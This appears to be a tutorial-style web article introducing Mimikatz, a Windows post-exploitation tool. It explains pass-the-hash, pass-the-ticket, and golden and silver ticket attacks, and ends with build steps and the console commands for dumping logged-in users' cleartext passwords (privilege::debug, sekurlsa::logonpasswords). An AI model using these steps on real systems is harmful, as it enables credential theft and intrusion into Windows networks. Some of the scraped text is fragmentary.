Introduction: What is Mimikatz?
Mimikatz is a powerful and well-known post-exploitation tool written in C, capable to extract plaintexts passwords, hash, PIN codes and kerberos tickets from memory. It can also perform pass-the-hash, pass-the-ticket or build Golden tickets (detailed explanation below).
But today, Mimikatz’s primary purpose and usage is stealing users credentials that are logged in to a specific/targeted Windows machine. It’s almost always used for malicious purpose, although it was never build as a hacking tool. In the last couple of years it was used as a part of the ransomware worms (2017: NotPetya and BadRabbit) that were spread all around the globe.
Mimikatz: “A Small Tool To Play With Windows Security”
The Mimikatz is an open-source post-exploitation (credentials stealing) tool which allows you to obtain login / password data, both from hash or clear text. You can use to attack targeted Windows machines/users and extract cleartext passwords or password hashes from memory, as well as PINs, Kerberos tickets, etc. it also provides are useful attacks such as:
pass-the-cache or building Golden Kerberos tickets. It comes in two flavors: Windows x32/x64.
This amazing and very effective offensive security tool also includes modules (listed below) and comes bundled (
Mimikatz v1) with a Meterpreter script as part of Metasploit Framework.
|net||misc||library mimilib||driver mimidrv|
Pass-the-HashStoring password data in
NTLMhash: Without need to crack the password, attacker can easily go trough using Mimikatz, which will then pass hash string to the target machine and allow attacker to login.
Over-Pass the Hash (Pass the Key)Another pass-the-hash attack technique, but in this one attacker will pass a unique key to imitate a victim which you can obtain from a domain controller.
Pass-the-TicketStoring password data in a “ticket” construct: capability to pass a kerberos ticket to another machine and login with that user’s ticket.
Pass-the-CacheSame as the pass-the-ticket attack technique, except it uses saved and encrypted login data on OS X, Linux and UNIX systems.
Kerberos Silver TicketAnother Pass-the ticket attack technique: this silver ticket provides easy service usage on the network. It grants a TGS ticket which can be further use to login into any services on the network.
Kerberos Golden TicketPass-the ticket attack technique: specific ticket for a hidden KRBTGT account, which is able to encrypt all of the other tickets. With this golden ticket you’ll get domain admin credentials to any machine.
mimilib: Visual Studio
- mimikatz driver, mimilove and ddk2003 platform: Windows Driver Kit
- Download from GitHub (options:
- Once build, run the executable as admin (make sure you’re running the correct version suitable for targeted machine).
- Start extracting some passwords from the memory.
.#####. mimikatz 2.2.0 alpha (x64) #17763 Apr 10 2019 00:55
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY
gentilkiwi( firstname.lastname@example.org )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( email@example.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
First you’ll need to check do you have all the permissions (
debug) to start dumping some passwords:
mimikatz # privilege::debug
privilege '20' OK
Then start logging process using
mimikatz # log logfilename.log
If everything goes well and without errors, you can start by outputting cleartext passwords:
mimikatz # sekurlsa::logonpasswords
For more information, usage examples and detailed explanations click on the “documentation” button below.